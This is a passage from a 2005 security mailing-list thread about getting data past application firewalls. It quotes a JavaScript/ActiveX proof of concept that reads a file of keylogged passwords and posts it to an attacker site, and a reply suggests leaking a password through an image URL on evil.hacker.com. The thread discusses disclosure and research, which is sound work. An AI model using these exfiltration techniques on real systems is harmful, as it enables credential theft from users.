Re: new attack technique? using JavaScript+XML+OWS Post Data

[Joachim Schipper <j.schipper () math uu nl>]

On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
> While researching COM related security vulnerabilities I thought of
> this possible attack technique, not sure if it has been discussed
> before.
>
>
> Problem/challenge statement:
>
> A Trojan has been to be placed in a system running an application
> firewall like Zone Alarm Pro etc. The Trojan is not allowed to make
> any outbound connections. The challenge is to send data (key logged
> passwords etc) back to the attacker.

> Solution
>
> The Trojan can be designed to generate an xml file which will contain
> the data to be sent out. The attacker will lure the user to visit a
> website hosted by him. The site can have following HTML code-
>
> <html>
> <body>
> The author is not responsible for any misuse, this PoC is for
> educational purpose only.
> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> id="exp">
> </object>
> <script LANGUAGE=javascript>
> var xmlDoc
> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> xmlDoc.async=false;
> xmlDoc.load("c:\\note.xml");
> xmlObj=xmlDoc.documentElement;
> var a= xmlObj.firstChild.text;
> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> </script>
> </body>
> </html>
>
> Content of note.xml could be ?
>
> <password>secret</password>
>
>
> The above code (works well on windows XP SP2) essentials calls "OWS
> Post Data" COM control to post the contents of note.xml (generated by
> trojan) to attackersite.com
>
> Essentially, the technique is breaking the basic functionality of
> application firewalls by using OWS Post Data as bridge for sending out
> the data using Javascript and XML.

> flames/spam/abuse etc can be sent to spam () securebox org
> comments can be sent to gaurav () securebox org

I'll just assume you read the list.

I'm not an expert, but I don't recall ever seeing this particular
implementation. Then again, there are easier ways to go about this - for
instance, how about embedding a <img
src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord"; width=1
height=1> tag into an arbitrary HTML file? It works on any graphical
browser without special protection.

Search the archives for some more neat tricks - calling the proper APIs,
IE can be used to send out pretty much arbitrary data. [1]

If you're willing to attack ZA specifically (instead of a generic
application/-based firewall, of which there are many) just use the
Windows API to generate the proper mouse clicks/keypresses.

                Joachim

[1] Some would say that, calling the 'proper' APIs, IE can be used to
send *in* pretty much arbitrary data too. I'd be inclined to agree.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/